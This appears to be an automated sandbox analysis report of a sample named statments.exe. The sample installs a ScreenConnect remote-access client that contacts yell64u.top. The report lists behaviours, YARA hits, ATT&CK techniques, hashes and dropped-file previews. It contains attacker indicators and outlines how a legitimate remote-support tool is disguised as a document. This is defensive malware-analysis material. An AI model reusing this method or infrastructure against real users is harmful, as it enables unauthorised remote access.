                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deployment.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeQueries volume information: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll VolumeInformationJump to behavior
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exeCode function: 10_2_00007FFB4A8B3642 CreateNamedPipeW,10_2_00007FFB4A8B3642
                              Source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exeCode function: 8_2_00CF4D2E RtlGetVersion,8_2_00CF4D2E
                              Source: C:\Users\user\Desktop\statments.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                              Lowering of HIPS / PFW / Operating System Security Settings

                              barindex
                              Source: C:\Windows\System32\msiexec.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa Authentication PackagesJump to behavior
                              Source: Yara matchFile source: statments.exe, type: SAMPLE
                              Source: Yara matchFile source: 1.2.statments.exe.5740000.10.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.0.ScreenConnect.WindowsClient.exe.700000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 10.2.ScreenConnect.WindowsClient.exe.2b6fa20.0.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.statments.exe.4d5db8.2.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.2.statments.exe.5740000.10.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.statments.exe.4ac3d8.3.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.statments.exe.410000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 11.2.ScreenConnect.WindowsClient.exe.280fa60.4.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 1.0.statments.exe.4263d8.5.raw.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 0000000A.00000000.1625996294.0000000000702000.00000002.00000001.01000000.00000011.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1565481069.0000000005740000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000A.00000002.2791566703.0000000002AF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000000.1521771269.0000000000426000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: 00000001.00000002.1549465731.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                              Source: Yara matchFile source: Process Memory Space: statments.exe PID: 2564, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 2288, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 6792, type: MEMORYSTR
                              Source: Yara matchFile source: Process Memory Space: ScreenConnect.WindowsClient.exe PID: 3836, type: MEMORYSTR
                              Source: Yara matchFile source: C:\Config.Msi\4d36d9.rbs, type: DROPPED
                              Source: Yara matchFile source: C:\Windows\Installer\MSI3C18.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe, type: DROPPED
                              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                              Gather Victim Identity InformationAcquire Infrastructure1
                              Valid Accounts
                              31
                              Windows Management Instrumentation
                              1
                              DLL Side-Loading
                              1
                              DLL Side-Loading
                              11
                              Disable or Modify Tools
                              OS Credential Dumping11
                              Peripheral Device Discovery
                              Remote Services11
                              Archive Collected Data
                              2
                              Encrypted Channel
                              Exfiltration Over Other Network MediumAbuse Accessibility Features
                              CredentialsDomains1
                              Replication Through Removable Media
                              1
                              Native API
                              1
                              DLL Search Order Hijacking
                              1
                              DLL Search Order Hijacking
                              1
                              Deobfuscate/Decode Files or Information
                              LSASS Memory1
                              File and Directory Discovery
                              Remote Desktop ProtocolData from Removable Media1
                              Non-Standard Port
                              Exfiltration Over BluetoothNetwork Denial of Service
                              Email AddressesDNS ServerDomain Accounts12
                              Command and Scripting Interpreter
                              1
                              Valid Accounts
                              1
                              Valid Accounts
                              1
                              Obfuscated Files or Information
                              Security Account Manager45
                              System Information Discovery
                              SMB/Windows Admin SharesData from Network Shared Drive1
                              Non-Application Layer Protocol
                              Automated ExfiltrationData Encrypted for Impact
                              Employee NamesVirtual Private ServerLocal AccountsCron2
                              Windows Service
                              1
                              Access Token Manipulation
                              1
                              Software Packing
                              NTDS21
                              Security Software Discovery
                              Distributed Component Object ModelInput Capture1
                              Application Layer Protocol
                              Traffic DuplicationData Destruction
                              Gather Victim Network InformationServerCloud AccountsLaunchd1
                              Bootkit
                              2
                              Windows Service
                              1
                              DLL Side-Loading
                              LSA Secrets2
                              Process Discovery
                              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts13
                              Process Injection
                              1
                              DLL Search Order Hijacking
                              Cached Domain Credentials51
                              Virtualization/Sandbox Evasion
                              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                              File Deletion
                              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job122
                              Masquerading
                              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                              Valid Accounts
                              /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                              IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                              Access Token Manipulation
                              Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                              Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd51
                              Virtualization/Sandbox Evasion
                              Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                              Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task13
                              Process Injection
                              KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
                              Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
                              Hidden Users
                              GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service
                              Business RelationshipsServerTrusted RelationshipVisual BasicContainer Orchestration JobContainer Orchestration Job1
                              Bootkit
                              Web Portal CaptureLocal GroupsComponent Object Model and Distributed COMLocal Email CollectionInternal ProxyCommonly Used PortDirect Network Flood
                              Identify Business TempoBotnetHardware AdditionsPythonHypervisorProcess Injection1
                              Rundll32
                              Credential API HookingDomain GroupsExploitation of Remote ServicesRemote Email CollectionExternal ProxyTransfer Data to Cloud AccountReflection Amplification
                              Hide Legend

                              Legend:

                              • Process
                              • Signature
                              • Created File
                              • DNS/IP Info
                              • Is Dropped
                              • Is Windows Process
                              • Number of created Registry Values
                              • Number of created Files
                              • Visual Basic
                              • Delphi
                              • Java
                              • .Net C# or VB.NET
                              • C, C++ or other language
                              • Is malicious
                              • Internet
                              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1536325 Sample: statments.exe Startdate: 17/10/2024 Architecture: WINDOWS Score: 42 55 yell64u.top 2->55 61 .NET source code contains potential unpacker 2->61 63 .NET source code references suspicious native API functions 2->63 65 Detected potential unwanted application 2->65 67 3 other signatures 2->67 8 msiexec.exe 94 51 2->8         started        12 ScreenConnect.ClientService.exe 2 5 2->12         started        15 statments.exe 5 2->15         started        signatures3 process4 dnsIp5 35 C:\...\ScreenConnect.WindowsClient.exe, PE32 8->35 dropped 37 C:\...\ScreenConnect.ClientService.exe, PE32 8->37 dropped 39 C:\...\ScreenConnect.WindowsClient.exe.config, XML 8->39 dropped 43 10 other files (none is malicious) 8->43 dropped 73 Enables network access during safeboot for specific services 8->73 75 Modifies security policies related information 8->75 17 msiexec.exe 8->17         started        19 msiexec.exe 1 8->19         started        21 msiexec.exe 8->21         started        57 yell64u.top 85.239.34.190, 49706, 8880 RAINBOW-HKRainbownetworklimitedHK Russian Federation 12->57 77 Reads the Security eventlog 12->77 79 Reads the System eventlog 12->79 23 ScreenConnect.WindowsClient.exe 3 12->23         started        26 ScreenConnect.WindowsClient.exe 2 12->26         started        41 C:\Users\user\AppData\...\statments.exe.log, ASCII 15->41 dropped 81 Contains functionality to hide user accounts 15->81 28 msiexec.exe 6 15->28         started        file6 signatures7 process8 file9 31 rundll32.exe 11 17->31         started        69 Creates files in the system32 config directory 23->69 71 Contains functionality to hide user accounts 23->71 45 C:\Users\user\AppData\Local\...\MSI2F66.tmp, PE32 28->45 dropped signatures10 process11 file12 47 C:\Users\user\...\ScreenConnect.Windows.dll, PE32 31->47 dropped 49 C:\...\ScreenConnect.InstallerActions.dll, PE32 31->49 dropped 51 C:\Users\user\...\ScreenConnect.Core.dll, PE32 31->51 dropped 53 4 other files (none is malicious) 31->53 dropped 59 Contains functionality to hide user accounts 31->59 signatures13

                              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                              windows-stand
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsAuthenticationPackage.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsBackstageShell.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsClient.exe0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsCredentialProvider.dll0%ReversingLabs
                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.WindowsFileManager.exe0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.Cab.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.Compression.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\Microsoft.Deployment.WindowsInstaller.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Core.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.InstallerActions.dll0%ReversingLabs
                              C:\Users\user\AppData\Local\Temp\MSI2F66.tmp-\ScreenConnect.Windows.dll0%ReversingLabs
                              C:\Windows\Installer\MSI3C77.tmp0%ReversingLabs
                              C:\Windows\Installer\MSI3F66.tmp0%ReversingLabs
                              No Antivirus matches
                              No Antivirus matches
                              SourceDetectionScannerLabelLink
                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                              https://feedback.screenconnect.com/Feedback.axd0%URL Reputationsafe
                              NameIPActiveMaliciousAntivirus DetectionReputation
                              yell64u.top
                              85.239.34.190
                              truetrue
                                unknown
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://wixtoolset.org/releases/rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                  unknown
                                  http://wixtoolset.org/news/rundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                    unknown
                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameScreenConnect.ClientService.exe, 00000008.00000002.2793225366.00000000015DA000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000B.00000002.1677731349.0000000002791000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    unknown
                                    http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/vrundll32.exe, 00000005.00000003.1572578801.0000000004352000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572760296.0000000004253000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1572578801.00000000043C1000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr, Microsoft.Deployment.WindowsInstaller.dll.5.dr, Microsoft.Deployment.WindowsInstaller.Package.dll.5.drfalse
                                      unknown
                                      https://feedback.screenconnect.com/Feedback.axdScreenConnect.Core.dll.3.drfalse
                                      • URL Reputation: safe
                                      unknown
                                      https://docs.rs/getrandom#nodejs-es-module-supportScreenConnect.WindowsCredentialProvider.dll.3.drfalse
                                        unknown
                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs
                                        IPDomainCountryFlagASNASN NameMalicious
                                        85.239.34.190
                                        yell64u.topRussian Federation
                                        134121RAINBOW-HKRainbownetworklimitedHKtrue
                                        Joe Sandbox version:41.0.0 Charoite
                                        Analysis ID:1536325
                                        Start date and time:2024-10-17 20:02:05 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 8m 31s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:15
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:statments.exe
                                        Detection:MAL
                                        Classification:mal42.evad.winEXE@17/56@1/1
                                        EGA Information:
                                        • Successful, ratio: 60%
                                        HCA Information:
                                        • Successful, ratio: 69%
                                        • Number of executed functions: 261
                                        • Number of non-executed functions: 5
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                        • Execution Graph export aborted for target rundll32.exe, PID 2288 because it is empty
                                        • Execution Graph export aborted for target statments.exe, PID 2564 because it is empty
                                        • Not all processes where analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtSetInformationFile calls found.
                                        • VT rate limit hit for: statments.exe
                                        No simulations
                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        85.239.34.190sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          yell64u.topsstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 85.239.34.190
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          RAINBOW-HKRainbownetworklimitedHKw6S2C7s1fv.elfGet hashmaliciousUnknownBrowse
                                          • 85.239.34.134
                                          55YxZeS0MZ.elfGet hashmaliciousUnknownBrowse
                                          • 85.239.34.134
                                          c8p9czsIyN.exeGet hashmaliciousLummaCBrowse
                                          • 85.239.33.148
                                          sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                          • 85.239.34.190
                                          aa.LnK.lnkGet hashmaliciousUnknownBrowse
                                          • 102.165.46.145
                                          lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                          • 85.239.52.252
                                          lK1DKi27B4.dllGet hashmaliciousUnknownBrowse
                                          • 85.239.52.252
                                          nPyo7vtpRl.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          rdl3kBqbTy.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          nPyo7vtpRl.dllGet hashmaliciousUnknownBrowse
                                          • 45.86.230.68
                                          No context
                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.Client.dllScanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                            Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                              sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                  Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                    support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                      support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                        ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                          ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                            Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                              C:\Program Files (x86)\ScreenConnect Client (de5851ad6e374ce3)\ScreenConnect.ClientService.dllScanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                Scanned01Document_ms.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                  sstatment.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                    extukGiBrn.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                      Vh0tTzx4Ko.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                        support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                          support.Client.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                            ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                              ScreenConnect.ClientSetup (1).exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                Scan_doc_09_16_24_1120.exeGet hashmaliciousScreenConnect ToolBrowse
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):219650
                                                                                  Entropy (8bit):6.582107710120155
                                                                                  Encrypted:false
                                                                                  SSDEEP:3072:CZ9LUHM7ptZ8UKOGw5vMWSuRy1YaDJkflQn3H+QDO/6Q+cxbr0qMGG:CZuH2aCGw1ST1wQLdqvG
                                                                                  MD5:C62CB09F8B9B909B87D96C8BE0F4DD0B
                                                                                  SHA1:BA7A4A13EE0DA3D3094A3E9BFEF01AE21F07F2B8
                                                                                  SHA-256:90BE31E49917C87F215D1D84F1A0E32B6EA66C8D8759A3DC9FDB236A688A889F
                                                                                  SHA-512:0D774DD8C3835FE641C94C3381274D1E1960B728B204FA210BB4A9501100F99828912DC0CED915D96045EFCE424B03F470DB4E835A6745212F6A38430C15F13F
                                                                                  Malicious:false
                                                                                  Yara Hits:
                                                                                  • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Config.Msi\4d36d9.rbs, Author: Joe Security
                                                                                  Reputation:low
                                                                                  Preview:...@IXOS.@.....@jpQY.@.....@.....@.....@.....@.....@......&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}'.ScreenConnect Client (de5851ad6e374ce3)..setup.msi.@.....@.....@.....@......DefaultIcon..&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.....@.....@.....@.....@.......@.....@.....@.......@....'.ScreenConnect Client (de5851ad6e374ce3)......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]....ProcessComponents..Updating component registration..&.{AF52190F-9138-8DD5-E284-9AF07DDE1216}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{5462DCDA-B5AB-15F8-7838-2A54948A34EB}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{41277B46-8511-4FBD-DF82-7BFA9BAEED18}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{E2565D0B-BCDD-C1A1-A2A2-7660FC61A23D}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{A9BEA7A3-6285-A159-CBF3-596C269E6678}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@......&.{567A6AC5-C59B-6D1E-4D5E-D3E6B358A6AB}&.{080BBA10-81D8-D25A-4C52-E7D1AC89AA1E}.@....
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):652
                                                                                  Entropy (8bit):4.646296001566109
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:rHy2DLI4MWonY6c/KItfU49cAjUPDLm184c7eA7d5TlO5FMDKt5cFqu+HIR:zHE4rbM2xjU7M8LD7DTlcFq0qEIR
                                                                                  MD5:8B45555EF2300160892C25F453098AA4
                                                                                  SHA1:0992EBA6A12F7A25C1F50566BEEB3A72D4B93461
                                                                                  SHA-256:75552351B688F153370B86713C443AC7013DF3EE8FCAC004B2AB57501B89B225
                                                                                  SHA-512:F99FF9A04675E11BAF1FD2343AB9CE3066BAB32E6BD18AEA9344960BF0A14AF8191DDCCA8431AD52D907BCB0CB47861FFB2CD34655F1852D51E04ED766F03505
                                                                                  Malicious:false
                                                                                  Reputation:low
                                                                                  Preview:...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP....4..2...n_Q2T}........Z...5...........0A.p.p.l.i.c.a.t.i.o.n.D.i.r.e.c.t.o.r.y.N.a.m.e..... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....2B.l.a.n.k.M.o.n.i.t.o.r.M.e.s.s.a.g.e.F.o.r.m.a.t.....RE.n.d.P.o.i.n.t.S.t.a.t.u.s.S.l.e.e.p.i.n.g.F.o.r.F.r.e.e.L.i.c.e.n.s.e.T.i.t.l.e.F...FS.e.s.s.i.o.n.I.n.v.a.l.i.d.S.e.s.s.i.o.n.D.e.l.e.t.e.d.M.e.s.s.a.g.e.t.....Support..Support.2Software is Updating.Do not turn off your computer.,Not enough data receiving from host computer..Removed
                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):21018
                                                                                  Entropy (8bit):7.841465962209068
                                                                                  Encrypted:false
                                                                                  SSDEEP:384:rcoN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dB74dN78dH:P4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bsj4Bd
                                                                                  MD5:EF6DBD4F9C3BB57F1A2C4AF2847D8C54
                                                                                  SHA1:41D9329C5719467E8AE8777C2F38DE39F02F6AE4
                                                                                  SHA-256:0792210DE652583423688FE6ACAE19F3381622E85992A771BF5E6C5234DBEB8E
                                                                                  SHA-512:5D5D0505874DC02832C32B05F7E49EAD974464F6CB50C27CE9393A23FF965AA66971B3C0D98E2A4F28C24147FCA7A0A9BFD25909EC7D5792AD40CED7D51ED839
                                                                                  Malicious:false
